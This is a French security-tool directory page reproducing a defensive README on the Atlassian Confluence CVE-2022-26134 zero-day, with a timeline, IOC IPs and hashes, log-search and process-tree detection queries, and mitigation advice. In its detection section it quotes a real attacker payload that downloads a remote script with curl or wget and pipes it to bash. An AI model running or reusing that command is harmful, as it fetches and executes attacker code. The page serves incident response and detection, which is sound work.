Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Confluence-CVE-2022-26134 — Ce dépôt traite de l'exploitation Zero-Day d'Atlassian Confluence, sous l'angle de la défense et de l'analyse, du point de vue d'une équipe SecOps ou Blue Team. | Kitploit
Outils/GitHubGitHub/archanchoudhury/confluence-cve-2022-26134
Gestion des Indicateurs de Compromission (IOC)Analyse des VulnérabilitésExploitationAnalyse ForensiqueSécurité WebRenseignement sur les MenacesDétection d'IntrusionApprentissage et ÉducationRéponse aux Incidents

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubarchanchoudhury/confluence-cve-2022-26134

Confluence-CVE-2022-26134

Ce dépôt traite de l'exploitation Zero-Day d'Atlassian Confluence, sous l'angle de la défense et de l'analyse, du point de vue d'une équipe SecOps ou Blue Team.

Voir le dépôt
438il y a 4 ansPas encore vérifié
Partager

Confluence-CVE-2022-26134

Ce dépôt traite de l'exploitation Zero-Day d'Atlassian Confluence, de sa défense et de son point de vue d'analyse du côté d'une équipe SecOps ou Blue Team

Index

  • À propos
  • Chronologie
  • Comprendre l'exploit
  • Liste des IOC
  • Stratégie de détection
  • Plans d'atténuation
  • Références

À propos

Pendant le week-end du Memorial Day aux États-Unis, Volexity a mené une enquête de réponse aux incidents impliquant deux serveurs web exposés à Internet appartenant à l'un de ses clients, qui exécutaient le logiciel Atlassian Confluence Server. L'enquête a débuté après la détection d'une activité suspecte sur les hôtes, notamment l'écriture de webshells JSP sur le disque. Volexity a immédiatement utilisé Volexity Surge Collect Pro pour collecter la mémoire système et les fichiers clés des systèmes Confluence Server à des fins d'analyse. Après un examen approfondi des données collectées, Volexity a pu déterminer que la compromission du serveur provenait d'un attaquant lançant un exploit pour exécuter du code à distance. Volexity a ensuite pu recréer cet exploit et identifier une vulnérabilité zero-day impactant les versions entièrement à jour de Confluence Server.

Suite à la découverte et à la vérification de cette vulnérabilité, Volexity a contacté Atlassian pour signaler les détails pertinents le 31 mai 2022. Atlassian a depuis confirmé la vulnérabilité et a attribué le problème à CVE-2022-26134. Il a été confirmé qu'elle fonctionne sur les versions actuelles de Confluence Server et Data Center.

Chronologie

  • Un avis daté du 2 juin, 13h00 PT (20h00 UTC), ne décrit pas la nature de la faille et révèle une "exploitation active actuelle" détectée. Aucun correctif n'est disponible.
  • Volexity découvre un zero-day dans Confluence le 03/06/2022 (GMT)
  • Le 03/06/2022 (GMT) Atlassian
    • A clarifié les versions affectées
    • A ajouté une règle WAF
    • A ajouté un délai estimé pour la disponibilité des correctifs
  • Le 03/06/2022, nous avons observé des tentatives d'exploitation active et des POCs publiés partout sur Internet.
  • Le 03 juin 2022 à 8h00 PDT (heure du Pacifique, -7h) Atlassian a fourni des informations d'atténuation incluant le remplacement des fichiers jar et class
  • Le 03 juin 2022 à 10h00 PDT (heure du Pacifique, -7h) Atlassian a mis à jour avec les versions corrigées et supprimé les conseils intermédiaires concernant l'ajout d'une règle WAF.
  • Le 03 juin 2022 à 16h00 PDT (heure du Pacifique, -7h) Atlassian a mis à jour pour clarifier la limitation des mises à niveau par roulement.

Reportez-vous aux détails techniques ICI

Comprendre l'exploit

  • Vous pouvez consulter le blog de Volexity ICI pour comprendre les détails complets du principe de fonctionnement de cet exploit et les détails de l'analyse.
  • Regardez cette VIDÉO pour comprendre l'exploit et sa correction.

Liste des IOC

  • Comme il s'agit d'une vulnérabilité zero-day et qu'elle peut être exploitée très facilement, il n'existe pas de liste exclusive d'IOC. D'après les recherches de la communauté, il a été observé que l'attaquant tentait de déployer XMRIG, KINSING, MIRAI, etc. après l'exploitation.
  • La chaîne de l'exploit "semble" contenir cette chaîne ${ Ce motif n'est pas encodé en URL et n'est pas sûr pour les URL, il apparaîtrait donc comme : $%7B dans les journaux.
  • Le blog de Volexity fait référence au fichier Confluence : noop.jsp
  • Présence d'un webshell avec l'extension .jsp sans détails de chemin. Par exemple CELUI-CI
  • Quelques adresses IP-
root@kitploit:~
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
  • Empreintes de fichiers pour noop.jsp malveillant
root@kitploit:~
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
  • L'exploitation généralisée d'Atlassian Confluence CVE-2022-26134, spécifiquement confirmée comme fonctionnelle, a été observée le 4 juin 2022. Trouvez les IP uniques ICI

Stratégie de détection

  • Si vous avez un Confluence Server et Data Center exposé à Internet et non corrigé, il est sage de l'interpréter comme Compromis
  • Recherchez les NOUVEAUX fichiers dans le chemin Confluence sur le disque ayant l'extension .jsp ou autre.
  • Recherchez des processus enfants suspects à partir des journaux Tomcat
root@kitploit:~
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
  • Recherchez la chaîne ${ dans (répertoire d'installation)/logs/*.log
  • Dans les journaux d'accès, essayez egrep -a -i -f pattern.txt *.log où pattern.txt doit être enregistré comme ${ ou essayez simplement grep "\${" chemin_du_fichier_log ou essayez grep "$%7B" chemin_du_fichier_log
  • Vous pourriez avoir des requêtes web entrantes pour noop.js, vous pouvez donc essayer findstr -i noop.jsp "logpath"
  • Vous pouvez avoir différents répertoires d'installation, essayez donc de trouver $jspname_jsp.java dans confluence_install_dir/work/Standalone/. Par exemple, si vous trouvez un shell nommé hack.jsp, vous devriez voir hack_jsp.java. Si vous ne trouvez pas hack.jsp (plus sur le disque), essayez de pivoter dans les journaux web pour rechercher l'accès à celui-ci. Cela donnera la signification de quand il a été accédé/supprimé.
  • Requête EQL process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' peut aider à identifier comme décrit par David ICI
  • Recherchez cette charge utile courante bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash dans les journaux web
  • Une signature Suricata peut être trouvée ICI
  • La configuration de chacun peut être différente, mais Confluence ne possède généralement que ces fichiers JSP :
root@kitploit:~
./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp

Donc, recherchez les fichiers créés récemment qui ne figurent pas dans la liste ci-dessus.

  • Vérifiez les fichiers sur le disque non listés et dans les journaux d'accès avec des réponses 200. Ensuite, vérifiez si certains de ces fichiers ont été modifiés. En particulier, noop.jsp est populaire et fait généralement environ 103 octets.
  • Si vous avez identifié que le fichier noop.jsp a été signalé, utilisez ce SCRIPT pour déterminer s'il est suspect.
  • Vous pouvez utiliser ce SCRIPT pour effectuer une analyse rapide de vos journaux afin de voir un acteur menaçant potentiel. NOTE - La liste des IP doit être vérifiée avant utilisation, de plus la liste n'est pas exclusive.
  • Examinez plusieurs cas pour rechercher des fichiers .java dans le répertoire ./confluence/org/apache/jsp/ qui ne devraient pas s'y trouver.
  • Recherchez l'arborescence des processus et l'exécution des processus sur tout hôte où vous avez identifié une tentative d'exploitation. Vous devriez rechercher une arborescence de processus comme : java->bash->python->bash
  • Un processus bash, engendré par un processus python, dont le père était un autre bash puis le processus racine java. Ce type d'exécution devrait être identifié.

Plans d'atténuation

  • Depuis le premier commit de ce dépôt, Atlassian a publié une version corrigée de Confluence Server et Data Center ICI
  • Si vous ne pouvez pas mettre à jour Confluence immédiatement, vous pouvez, en tant que solution de contournement temporaire, atténuer le problème CVE-2022-26134 en mettant à jour les fichiers suivants comme décrit ICI
  • Comme mesure immédiate, veuillez créer un plan de réponse aux incidents pour identifier vos instances exposées à Internet et effectuer la détection. Mettez le serveur sous liste blanche IP ou sous VPN pour réduire la surface de risque.

Références

  • https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
  • https://www.theregister.com/2022/06/03/atlassian_confluence_critical_flaw_attacked/
  • https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
  • https://www.shodan.io/search?query=x-confluence
  • https://www.shodan.io/search?query=http.favicon.hash%3A-305179312
  • https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/
  • https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
  • https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis?referrer=notificationEmail
  • https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/
Télécharger l’outil